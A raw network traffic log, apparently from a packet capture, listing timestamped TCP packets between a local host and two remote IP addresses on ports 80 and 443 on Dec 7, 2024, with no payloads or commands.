Dec 7, 2024 10:51:47.007086992 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.007122040 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.009860992 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.009913921 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.009963989 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.009996891 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.012816906 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.012862921 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.012927055 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.012981892 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.015732050 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.015799999 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.015813112 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.015846014 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.018682957 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.018757105 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.018771887 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.018805027 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.021735907 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.021784067 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.021859884 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.021935940 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.024511099 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.024563074 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.024601936 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.024641991 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.027441978 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.027478933 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.027549982 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.028098106 CET	443	49819	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.028320074 CET	443	49818	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.029252052 CET	49819	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.029284000 CET	443	49819	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.029521942 CET	49818	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.029542923 CET	443	49818	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.030092001 CET	49819	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.030102015 CET	443	49819	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.030282021 CET	49818	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.030289888 CET	443	49818	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.030364990 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.030385017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.030407906 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.030437946 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.031255007 CET	443	49817	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.031711102 CET	49817	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.031723976 CET	443	49817	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.032284021 CET	49817	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.032289028 CET	443	49817	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.033226013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.033296108 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.033327103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.033366919 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.036223888 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.036276102 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.036295891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.036359072 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.038928032 CET	443	49820	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.039124966 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.039185047 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.039408922 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.040034056 CET	49820	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.040050983 CET	443	49820	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.040535927 CET	49820	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.040543079 CET	443	49820	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.042099953 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.042208910 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.042253017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.042304993 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.045017958 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.045087099 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.045176029 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.045221090 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.047873974 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.047936916 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.048077106 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.048198938 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.050725937 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.050785065 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.050961018 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.051012039 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.053675890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.053749084 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.053757906 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.053826094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.056600094 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.056709051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.056729078 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.056751013 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.059547901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.059611082 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.059695005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.059750080 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.062473059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.062520981 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.062654018 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.062709093 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.065390110 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.065442085 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.065490007 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.065534115 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.068291903 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.068334103 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.068403006 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.068459034 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.071191072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.071242094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.071482897 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.071525097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.074191093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.074295998 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.074408054 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.077061892 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.077111959 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.077157021 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.077191114 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.079919100 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.079977989 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.080035925 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.080084085 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.082902908 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.082956076 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.083019972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.083058119 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.157279968 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.157351017 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.157418013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.157466888 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.158582926 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.158648014 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.158674955 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.158715010 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.161093950 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.161154032 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.161159992 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.161194086 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.163674116 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.163731098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.163770914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.163811922 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.166235924 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.166294098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.166332960 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.166368008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.168762922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.168824911 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.168854952 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.168894053 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.171212912 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.171294928 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.171350956 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.173609972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.173697948 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.173717976 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.173742056 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.175995111 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.176042080 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.176129103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.176239014 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.178294897 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.178344965 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.178397894 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.178502083 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.180610895 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.180655956 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.180727959 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.180766106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.182862043 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.182928085 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.182975054 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.183043003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.185158968 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.185194016 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.185203075 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.185226917 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.187364101 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.187417030 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.187432051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.187472105 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.189477921 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.189574003 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.189637899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.191704988 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.191734076 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.191795111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.193892956 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.193932056 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.193941116 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.193975925 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.196114063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.196203947 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.196347952 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.196389914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.198182106 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.198225975 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.198260069 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.198298931 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.200072050 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.200177908 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.200207949 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.200361967 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.202230930 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.202272892 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.202297926 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.202336073 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.204169989 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.204233885 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.204376936 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.206166029 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.206237078 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.206276894 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.208153963 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.208200932 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.208239079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.208278894 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.210189104 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.210217953 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.210238934 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.210258961 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.212099075 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.212151051 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.212188959 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.212321997 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.214401960 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.214416027 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.214473963 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.216075897 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.216120005 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.216154099 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.216190100 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.218087912 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.218153000 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.218156099 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.218194008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.220031977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.220103979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.220136881 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.220170021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.222058058 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.222150087 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.222153902 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.222193003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.224020004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.224069118 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.224152088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.224193096 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.225943089 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.225989103 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.226042986 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.226083040 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.227991104 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.228037119 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.228118896 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.228262901 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.229959011 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.229984999 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.230007887 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.230032921 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.231923103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.232004881 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.232070923 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.233900070 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.233952999 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.233952045 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.233997107 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.235852003 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.235903978 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.235943079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.235989094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.237869024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.237915039 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.237977982 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.238262892 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.239886045 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.239945889 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.240020037 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.240061998 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.241796017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.241841078 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.241894007 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.241930962 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.243773937 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.243828058 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.243876934 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.244002104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.245753050 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.245893002 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.245981932 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.246038914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.247718096 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.247797966 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.247822046 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.248003006 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.249715090 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.249764919 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.249813080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.249850035 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.251699924 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.251805067 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.251868963 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.253690958 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.253760099 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.253809929 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.253885031 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.255649090 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.255706072 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.255707979 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.255747080 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.257627964 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.257689953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.257734060 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.257775068 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.259594917 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.259696960 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.259715080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.259756088 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.261624098 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.261679888 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.261781931 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.261859894 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.263583899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.263648987 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.263667107 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.263717890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.265552998 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.265604973 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.349385977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.349450111 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.349464893 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.349499941 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.350043058 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.350162983 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.350267887 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.350384951 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.351569891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.351635933 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.351655006 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.351706028 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.353063107 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.353176117 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.353225946 CET	80	49808	185.215.113.206	192.168.2.6
